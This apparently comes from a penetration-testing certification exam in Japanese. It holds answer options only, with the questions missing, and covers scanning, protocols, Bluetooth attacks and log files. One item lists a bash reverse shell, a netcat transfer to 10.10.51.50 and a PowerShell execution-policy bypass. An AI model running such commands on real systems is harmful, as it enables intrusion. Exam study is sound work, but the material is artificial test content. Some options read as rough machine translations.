A. 何か問題が発生した場合に誰かが対応できるようにするため
B. PCI DSS テスト要件を満たすため
C. 帯域制限が懸念されるため
D. お客様の ISP との SLA のテスト用
A. 犯罪のデジタル フォレンジック調査と並行して進行します。
B. 毎月の脆弱性スキャン中に発生します。
C. 機密情報が平文で保存されていることを確認します。
D. 評価の過程で以前の侵害の痕跡を明らかにします。
A. クロールURはインターセプションプロキシを使用しています
B. Web ブラウザを使用して URI をクロールする
C. cURL を詳細オプション付きで使用する
D. 細工されたリクエストに Scapy を使用する
A. SMTP
B. SNMP
C. Telnet
D. NTP
E. DNS
F. HTTP
A. サーバーに対して FTP エクスプロイトを使用します。
B. 次のログインを待って、サーバーに対してダウングレード攻撃を実行します。
C. Wireshark を使用してトラフィックをキャプチャします。
D. サーバーに対してブルート フォース攻撃を実行します。
A. 関連付けられている WiFi デバイスの WPS PIN をスニッフィングしてクラックします。
B. 2 つの Bluetooth デバイス間の接続を切断します。
C. テキスト メッセージをデバイスに送信します。
D. デバイスのユーザー アドレス帳をダンプします。
A. wget 10.10.51.50:9891/エクスプロイト
B. powershell -exec bypass -f \\10.10.51.50\9891
C. nc 10.10.51.50 9891 < エクスプロイト
D. bash -i >& /dev/tcp/10.10.51.50/9891 0&1>/エクスプロイト
A. ファイルをUSBドライブにコピーし、郵送する
B. ファイルをダウンロードするには FTPS セキュリティが必要です
C. クラウドサービス上にリンクを作成し、電子メールで配信する
D. ファイルを暗号化するためのPGP公開鍵を要求しています
A. クレデンシャル ハーベスティング
B. パスワード スプレー
C. ドメイン レコードの悪用
D. 権限昇格
A. 四半期ごと
B. 毎月
C. 毎週
D. 毎年
A. タプル
B. 配列
C. 辞書
D. 木
A. Nmap スキャン
B. WHOIS ルックアップ
C. パケットキャプチャ
D. 脆弱性スキャン
A. 8 ビット ブロックをスキャンして、欠落している追加のホストをマップします。
B. 評価を続行します。
C. ROE を新しい署名で更新します。最も投票された
D. 契約を終了します。
A. /var/log/lastlog
B. /var/log/last_user
C. /var/log/user_log
D. /var/log/messages